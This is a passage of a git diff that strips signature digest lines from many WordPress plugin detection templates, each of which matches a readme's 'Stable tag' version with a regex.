a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207cb19141a5e73a34fda7560cadc98f1802f766b3ad45bb9aaed676d24ee23bbc02203a42c65c94b3323c003fda7a8a50dbb1aa9a932a292223842dee3daafef40bb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 7bdaef021f..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207a5be0f8d488a5218c14866a338df2448e550922277a63646d6558a382b3f52302202770cc1193758792312b7e9c46e0e5b3f53f6677170c942705d6a8fe00ae7a12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index c0b4d471f6..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100856e30449bcf8c2270d7fddffc9265eb7a7c52b6708f29e193a6cbc97acbad00022100cde8b4323cb87e74b61716b42ca67d08e1b459c864328ed8ed0734cc499641d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f8c5d99985..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220674296ba3b413e9ac4bc2f53bbd6bd84498dc72fc902021c1fa31297365041420220307ca9760db7d79fc8fefc9613d8790582714d3415733f54521017223ace5af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 5577561841..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022066f47bf155f0a61d613ce4527ebf765a6b6cd7d1263053a1e19aed0337245849022036e8133d318d023222b700f082281b29376bbbd9795aa74dd58e2c3943c27224:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 99e7f54fb0..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053b712332c6a17372c4e4c2429804460c0d60983768b00ab15160e82fc0bafc00220102a22621412f594e9bfdb6704ab13ec51a5e87aa98b8bd4f543da04d6aafad5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 64bf3e4ff5..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c363a4777bf7de3c8ac0ac49bd1ff010a71e75ab0526b3139f0f99be51ea5c510220472e9a8b1eb4e17821a3d02984653eed6b0c2891add292f2ff7a898571e8ac0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index ff37d827ce..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bc1214b926fcdce8bd4b3be920745258132de22d8b278b5b259fe60191e5bdf6022100ee23f9d08da6d70aa8b43d1174473c6f50a0d92a05ebadeb52920042e7de5271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index c4f6e37ba2..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022050534122bf8436e12397ce8321323120bccda73a592c22e2ddb376b32649bc09022100da621ce9ac76ee869527ccd2c26c39129ba0cac73c2939ccbc3167a409ae6cd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index e849ae672a..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220328cb9ff0f8010583a1c709cfda57969f1ff4cf02be3204259213182aa29097b022014381bb2a9cd30dfbc93c0029aa68e594c6530dd73079df76841bbeffc273af7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 2650418678..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220659f3b15197085fe67e165e3a459c7aa05b3c1de3088a9c4f47e712dc5c50537022100be59ac7af2a95d5535e06762c260073125e62a1f228d34c5888eb5277fcedd00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8cb34f1712..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f327e5ec0b3d9e68658605b0b453e4f6b14808f6e7b2f8ec5cdff2ae90efd5dc022014578637d4d2ec9259d0599701b2cc6fe039d25871feeb9c8e9e4aa20a5bedc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 56faa963dc..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008589d1aae19b56791ce5bc70dbf22425e64a85f611bb2f26f9248c9a59f1b0bb022100b0119257c103bad8d81a35abeac0b2c38408551eaf932e48e7bbd0e3d6995ab3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index fd5eca6efc..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fb03c21390a02b0ae4f40a425839122b4ed652ba55d751f00b6725def1488a33022017e3825d9bc6756c6f7f80091034a46c8877fa1080f8d1d8f176479e37f1501f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index de1b1a6259..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c080f3ba053dfe914f01cac260418d77338ee431bcf44f23b4fa5ec6c92ea77c022023243d159639b5adfd3a7e8dadeee0da0aa18bcec13c7fc9e07c0f585e71caf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 24a0d0b972..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b550d88ff0c2a7fe812b09cf496e8895fcdadd9019b0028690306696b6cc05c1022100ea4f611a03192117113c189a0186a8784698af06fe0bdc47eb2d4be7b140bfb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 417c4b753c..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022001268a8155228d28456c0f9ef4be3e9d2fef3d8069bdd8f0362781947317910402203b341d8932d201bf9e253dff5b0d9bc8e4523c72ea9a2b601c3fc05767137596:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 2bcb21f357..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200474526d53d6a55aa692e0778be891e532465de11337427dc0f33a4226c840e5022100cd61d7076854216876a1b2b86e183fded17b95d6d38b649a914619c612e70232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 387962c587..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022027d00990bf60a758c42300b3b2cb9030dbeeac240dc86880444fadd3790d0a720220517163c8b542a91ca10fb273d731cb2fd4c96174caddf288d2b7f22e960cc66c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 26b2d3560c..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022069cd527c2959bdfca7754c3d0d9058f12be483ea83c6d94935edd13360182dc2022100f3e4b3f63ba043290ca2112bdd7bf083652c68eaed0fba70af533346cd975a40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index f5658d2193..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203380a395d21423bd7e4f6d210a65b112383b713536f817c9f02016360fae4f900220150d3c5119fe0bc253c881504c75b1c41cd9bbaced50ffa7be3c0c34db26252f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index f710d55c61..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022019fcade195804318fb3cae62b23dfbc0c266e8c89877a01cc6fdc3cd23130636022062376848d6e2dcda093738c90cb3587a89959f7f4d4bcf5c9547753c3709244b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 0cb5ff31cc..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022047591fb9b5e6d02d68dd974015b945979a5cbf5a8af40f90373098e936f2f84602205ea1f5a0b909a8d7a0a72c8d712b0bed9cb397dd6c81a15984ccbfd0d0abea96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 8d2de6afdc..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220585826e501c52addd57a80749c62aecf2771a4d9a5509b39d225c3d282b96ceb022100c1c7fd22b9e1dd2563208facd2e5dcb84e9e8fbe96f5b32b04e3d768f3f534c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 5562789db6..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cac128f93ab2a0af1d2b171dbb19ed807ad24ad734cd0f172f662e4ed2ff032702200b7730205e9885388010467e8bfd6e08fb6e6313e594218046427975a05abf55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 4544ab56be..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009708159ed6d4335255d8bd75179fb075f5c74eb5fd6b94e415f936f7eb5c01e10220277b3557715644694504b1086eae7632d8bec9d9f4bdb13872820c1987c9a362:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 9e7e469e4d..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100abbd4c45a0eead187c7c9c8749de488de68bfa80c7db55f2f2309ef3010a403b022100ba3b9a0f73945d823161a9f92924c9ef0da942dcfa039ef351fe99408145b5dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index f684144e28..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022043916162dcbb7ec1037686a0674b0e74103a99219b790a8c9c1142d98bbe972e022100cffea2799f8c5b12c06df34658477bc13d57f68b4046a086c8596c8b7804d080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index b9e78bc0c9..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207d279e60e1630c929e3dbe927c7e1889c09bf9e77d9632a97aa1c30ff322a080022100e11f77a0cc80220fc8848865a8b6e679208e33f6c105d6e74bcf9c684b2f192f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 3f35c7a21d..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c11331d52e40784aa14b7d131fec0abe61a0be72fb0bb1c28ece8668e6c6254102204a12f51cd5277a43289711d6c270ef80f3247368856f1d1b51fe8542d83501c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index cfb03963c0..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220724cc4a28fdc2276856db3d1e9fd9aa00365f7d363b295773cac1fe6d2405729022065080102dc9dc613cae9a78af31a04e4c8ffed272a87283b0c05fdaaebdd41ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 72d0ad262b..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dac6afe6525dafb4ae90db8cbabaac1912bbf1b2b8407974de674bf1b882409f02202102b5e065d07ca8faffb4eaf712175b64fff9940196d0f11ca8206a40b6c5dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index c9d763a5ec..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cd5d5682f58b6e96defb10693dc7171d531d131b77a58db4600a1cd66482aa44022100b7390f7a32f3258fca1a6c612d0c0630f889216f0e870a11d4366f236a2dd352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 83cfe8a597..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f2c348791e669750175494451364029547f7d165045021d4f578f056cd6ec1af02203f982be3e73274e85ce0a91c1603c0a549f13976f6dc33cc5c5829fa3c7e2767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 1cc21593b2..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022019791e8499c4431581c69f22b064701625d5dd73715b51935681023a28c3ffc902207a7402a359a2b147e9d08659ad9b3658906f013ab04ae23203819a68c46df46b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index df53cd6e49..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a65a6c8a1264a89a2e97a76dc9c1d9bf4202370a7e810644a4ae80bbb5a4cbe5022066422ce85b9cb08fafed713f5af65dd099ddab280e85dde9aed419cada1e8418:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 9e4adfa5c8..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a74c1ec6247d18be9ae88fdbf8ade365ef2ea187156a30d6f05a6186e6e617600220479de4e97099e2ae5377dda47eb439c69053c8985712789628ad7ede51acd9bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 80fcb5d9cd..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b71d99347cad40bcd0a68f16bdb950d2b87b61d089e9609c0b99f086268452c502210099e97f75f151b0482d15ba8e81b73a8d8604bec15ca07304c37fcee03692232d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 38e8ef29cb..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ba6b54e7a2c6c5fb6e50f2ac132b97793342af07fa21fc70f357e72f88f975b402206eabb1ae7811d6b6cc467e2ac79bc413d16b00e45c4f9345afb6dfc974762106:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 07aff9a14b..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d421769f143d3e8b223166aa2cd15f6e66796429e92ff0f28baf4d0ca6190b9e02206f15df3c6b894bb3424542e0d81055c6f36f2598b01e8fb8f7e81b3705e16e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index cecb6e406c..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202095ae21ae000f943302dae2b164e0d515ec2f824761f97334d78fee154ddab50220596e0f2b656412ae33a8802bf95e667fbb71170d759494cad4568b3f07072700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 66a2e7895f..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b7b3818de2a199603d28dd8e28c3b0f72d3863fec46b221c3c61533d2ae28665022100d9b6bd1c8f07f42b0b62640b61cd5ef959a6550a2db6be25e1d8d3f4513b7be3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index ada0b79d90..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c7a12ab59ec092156811cd2c1d04764c194a289508dda2e817d711030ff1cece02204b26ee87675a3af9cd27c9d35c88098ba6f87dbd6f7a573515b5b2feffed76fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 24f70897b7..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210086ef9ddd2d6ca0635b7d04a7ba28924e6eca809ea70b1bba7049360d9c589d10022100866f7e1f4e66779767e8016a421929e93660edebd6a2fa5c50334f92691002d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 2d37b28baa..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002e95b8f937b9b4fa3c8fb1c58bb8bea8c3235a73baacca5f9d2b0e747125e67022100ea8e59fa3c9a2cef1d6b1e4ef332e54a08c054e8a256acc32fe052805154ccf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 35e9da5f68..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d2917db74300aa01becfddd880c3886b81f46d6aba1fb3ad3c3b841d1f909e2602200f4c4734a4c6f90617f83f1ac253101daf9dfc948fd260b12f8efe6bb295c602:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 5365dd7958..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ad7ebb9ff7c226176020665a2bce9babb8c5f612f0ec042145adcd361d0e52e50220520b44a88a86bd6ec9c958f2f352a7fbc08093f2ba63c01619988100a9aebf21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 9d8d807e95..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 